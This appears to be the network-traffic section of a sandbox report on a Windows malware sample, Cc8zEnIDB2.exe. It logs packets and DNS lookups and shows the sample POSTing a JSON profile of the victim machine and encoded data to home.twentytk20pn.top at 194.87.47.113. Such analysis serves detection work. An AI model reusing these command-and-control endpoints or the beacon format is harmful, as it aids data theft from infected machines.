Dec 19, 2024 08:33:35.725224972 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:35.850951910 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:35.851028919 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:35.888957977 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:35.889034986 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.008641958 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.011194944 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.188986063 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.191340923 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.425293922 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.425714016 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.441957951 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.442178965 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.442250967 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.545316935 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.552814960 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.562540054 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.562570095 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.562589884 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.562681913 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.562690020 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.562726974 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.562782049 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.562828064 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.562868118 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.562911987 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.563028097 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.563038111 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.563092947 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.563126087 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.563134909 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.563189030 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.563200951 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.563288927 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.563334942 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.563391924 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.563590050 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.563632965 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.563730955 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.563827991 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.563985109 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.563994884 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.564080000 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.564121008 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.564207077 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.564220905 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.564342976 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.564387083 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.564471960 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.564512014 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.564552069 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.564594030 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.564611912 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.564671040 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.564681053 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.564716101 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.564721107 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.564757109 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.564785957 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.564824104 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.566780090 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.604897022 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.606658936 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.672636986 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.676618099 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.682485104 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.682523012 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.682605982 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.682665110 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.682737112 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.682885885 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.683046103 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.683099031 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.683228970 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.683278084 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.683469057 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.683562994 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.683660030 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.683731079 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.683762074 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.683854103 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.683887005 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.684241056 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.684271097 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.684299946 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.684334040 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.684402943 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.684495926 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.684525967 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.684539080 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.684581995 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.684586048 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.684638023 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.684686899 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.684741974 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.684771061 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.684818983 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.684973955 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.685022116 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.685086966 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.685131073 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.685159922 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.685225964 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.685229063 CET | 49709 | 80 | 192.168.2.10 | 194.87.47.113
Dec 19, 2024 08:33:36.685255051 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.685359955 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.685409069 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.685472965 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.685523987 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.685647011 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.685674906 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.685709000 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.685758114 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.685826063 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.685900927 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.685929060 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.685977936 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.686043024 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.686074972 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.686197042 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.686224937 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.686294079 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.686342955 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.686394930 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.686444044 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.686554909 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.686605930 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.686707973 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
Dec 19, 2024 08:33:36.686736107 CET | 80 | 49709 | 194.87.47.113 | 192.168.2.10
                                                    Dec 19, 2024 08:33:36.686806917 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.686871052 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.686983109 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.687031984 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.687196970 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.687246084 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.687299013 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.726366997 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.744590998 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.744859934 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.745122910 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.745580912 CET4970980192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:36.796339035 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.796408892 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.802299023 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.802407026 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.802417040 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.802428961 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.802500010 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804137945 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804218054 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804342985 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804399967 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804425955 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804508924 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804563999 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804573059 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804682016 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804691076 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804702044 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804719925 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804804087 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804812908 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804891109 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804899931 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.804970026 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805011034 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805109978 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805233002 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805294991 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805337906 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805464029 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805555105 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805563927 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805581093 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805737972 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805747986 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805790901 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805800915 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805828094 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.805970907 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806000948 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806135893 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806174040 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806302071 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806312084 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806369066 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806422949 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806432962 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806514978 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806540966 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806581020 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806652069 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806756020 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806766987 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806777954 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806802034 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806890965 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806900978 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806917906 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806946993 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.806984901 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.807101965 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.864630938 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:36.865008116 CET8049709194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:37.830358028 CET4971580192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:37.949914932 CET8049715194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:37.950109959 CET4971580192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:37.950433969 CET4971580192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:38.069972038 CET8049715194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:39.272774935 CET8049715194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:39.272912979 CET8049715194.87.47.113192.168.2.10
                                                    Dec 19, 2024 08:33:39.273014069 CET4971580192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:39.273250103 CET4971580192.168.2.10194.87.47.113
                                                    Dec 19, 2024 08:33:39.392796993 CET8049715194.87.47.113192.168.2.10
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Dec 19, 2024 08:33:32.004762888 CET  49227        53         192.168.2.10   1.1.1.1
Dec 19, 2024 08:33:32.004817963 CET  49227        53         192.168.2.10   1.1.1.1
Dec 19, 2024 08:33:32.142879963 CET  53           49227      1.1.1.1        192.168.2.10
Dec 19, 2024 08:33:32.143028975 CET  53           49227      1.1.1.1        192.168.2.10
Dec 19, 2024 08:33:35.182532072 CET  49230        53         192.168.2.10   1.1.1.1
Dec 19, 2024 08:33:35.182605028 CET  49230        53         192.168.2.10   1.1.1.1
Dec 19, 2024 08:33:35.319902897 CET  53           49230      1.1.1.1        192.168.2.10
Dec 19, 2024 08:33:35.319971085 CET  53           49230      1.1.1.1        192.168.2.10
Dec 19, 2024 08:33:37.690032959 CET  49232        53         192.168.2.10   1.1.1.1
Dec 19, 2024 08:33:37.690083027 CET  49232        53         192.168.2.10   1.1.1.1
Dec 19, 2024 08:33:37.827797890 CET  53           49232      1.1.1.1        192.168.2.10
Dec 19, 2024 08:33:37.829670906 CET  53           49232      1.1.1.1        192.168.2.10
Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name                   Type            Class        DNS over HTTPS
Dec 19, 2024 08:33:32.004762888 CET  192.168.2.10  1.1.1.1  0x8e93    Standard query (0)  httpbin.org            A (IP address)  IN (0x0001)  false
Dec 19, 2024 08:33:32.004817963 CET  192.168.2.10  1.1.1.1  0x7118    Standard query (0)  httpbin.org            28              IN (0x0001)  false
Dec 19, 2024 08:33:35.182532072 CET  192.168.2.10  1.1.1.1  0x8327    Standard query (0)  home.twentytk20pn.top  A (IP address)  IN (0x0001)  false
Dec 19, 2024 08:33:35.182605028 CET  192.168.2.10  1.1.1.1  0x5cf6    Standard query (0)  home.twentytk20pn.top  28              IN (0x0001)  false
Dec 19, 2024 08:33:37.690032959 CET  192.168.2.10  1.1.1.1  0xeabc    Standard query (0)  home.twentytk20pn.top  A (IP address)  IN (0x0001)  false
Dec 19, 2024 08:33:37.690083027 CET  192.168.2.10  1.1.1.1  0x4dba    Standard query (0)  home.twentytk20pn.top  28              IN (0x0001)  false
Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name                   CName  Address         Type            Class        DNS over HTTPS
Dec 19, 2024 08:33:32.142879963 CET  1.1.1.1    192.168.2.10  0x8e93    No error (0)  httpbin.org            -      98.85.100.80    A (IP address)  IN (0x0001)  false
Dec 19, 2024 08:33:32.142879963 CET  1.1.1.1    192.168.2.10  0x8e93    No error (0)  httpbin.org            -      34.226.108.155  A (IP address)  IN (0x0001)  false
Dec 19, 2024 08:33:35.319902897 CET  1.1.1.1    192.168.2.10  0x8327    No error (0)  home.twentytk20pn.top  -      194.87.47.113   A (IP address)  IN (0x0001)  false
Dec 19, 2024 08:33:37.829670906 CET  1.1.1.1    192.168.2.10  0xeabc    No error (0)  home.twentytk20pn.top  -      194.87.47.113   A (IP address)  IN (0x0001)  false
• httpbin.org
• home.twentytk20pn.top
Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.10  49709        194.87.47.113   80                7540  C:\Users\user\Desktop\Cc8zEnIDB2.exe
Timestamp  Bytes transferred  Direction  Data
Dec 19, 2024 08:33:35.442362070 CET  12360  OUT  POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
Host: home.twentytk20pn.top
Accept: */*
Content-Type: application/json
Content-Length: 499218
Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 35 39 33 36 31 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
Data Ascii: { "ip": "8.46.123.189", "current_time": "1734593613", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
Dec 19, 2024 08:33:35.562428951 CET  2472  OUT  Data Raw: 49 73 35 7a 53 72 53 61 77 38 5a 56 46 4f 76 54 70 55 35 4a 4e 52 6e 4b 57 68 35 5c 2f 52 54 32 58 48 49 36 66 79 70 6c 66 30 43 66 68 67 55 55 55 55 47 6c 50 72 38 76 31 49 58 6a 35 44 2b 5c 2f 2b 66 31 5c 2f 7a 36 4e 71 78 58 37 42 5c 2f 77 44
Data Ascii: Is5zSrSaw8ZVFOvTpU5JNRnKWh5\/RT2XHI6fyplf0CfhgUUUUGlPr8v1IXj5D+\/+f1\/z6NqxX7B\/wDBMb9iX4Ifta+D\/itqfxYi8WC+8E+I\/DdhpE\/hfxCujGS01vTdSuLiK+jnsNShm8mbTEa2eKK3kX7RcLO86+QsH5\/4meJGR+FXC1bi7iHCZtjMto43B4GVDJqGDxGOdbGzlTpSjTx2Oy6g6cXFuo3iVJK3LCb0
Dec 19, 2024 08:33:35.562465906 CET  4944  OUT  Data Raw: 48 79 5c 2f 77 43 5c 2f 5c 2f 77 42 2b 2b 50 38 41 4a 5c 2f 7a 6a 32 73 5c 2f 36 76 2b 44 35 5c 2f 77 43 66 70 5c 2f 6e 5c 2f 41 42 70 6e 33 73 37 50 77 39 76 72 5c 2f 6e 38 36 44 74 4b 33 2b 5c 2f 6a 72 7a 5c 2f 6b 39 36 68 54 70 5c 2f 77 42 73
Data Ascii: Hy\/wC\/\/wB++P8AJ\/zj2s\/6v+D5\/wCfp\/n\/ABpn3s7Pw9vr\/n86DtK3+\/jrz\/k96hTp\/wBsh\/NqtP1\/D+pqNv8AV7Nn4c\/54\/X+QdBDk+\/\/AH5\/+vUMn+3+8HOBVnb\/AB\/j0\/HGaZ5fT59n+T2GKCv+XP8A26VJG8zf84f97\/yyBqPc7Lsz\/n6\/5\/On\/wB\/5Pkz18317\/z\/AJ0z+4+zP73
Dec 19, 2024 08:33:35.562508106 CET  2472  OUT  Data Raw: 74 2b 4e 53 55 6a 41 74 2b 65 61 5c 2f 33 71 50 2b 61 63 67 6f 71 58 59 50 66 5c 2f 41 44 2b 46 47 77 65 5c 2f 2b 66 77 6f 41 69 72 2b 6a 6e 5c 2f 67 68 63 78 48 67 58 39 6f 6b 44 74 34 73 2b 48 70 5c 2f 50 52 5c 2f 46 50 38 41 38 54 58 38 35 65
Data Ascii: t+NSUjAt+ea\/3qP+acgoqXYPf\/AD+FGwe\/+fwoAir+jn\/ghcxHgX9okDt4s+Hp\/PR\/FP8A8TX85ewe\/wDn8K\/eL\/gkt8Q1+Ev7NX7cXxSktPt8fwz8P2XxBexJcLeJ4O8AfEHxE1o3llX23I0wwnY6thztZTg1\/Ln0v8LXx\/g9VwOFh7XE4zirhnC4enovaV8RjZ0qULyaS56k4xu2kr6n9n\/QQxlHBePeHxuKm
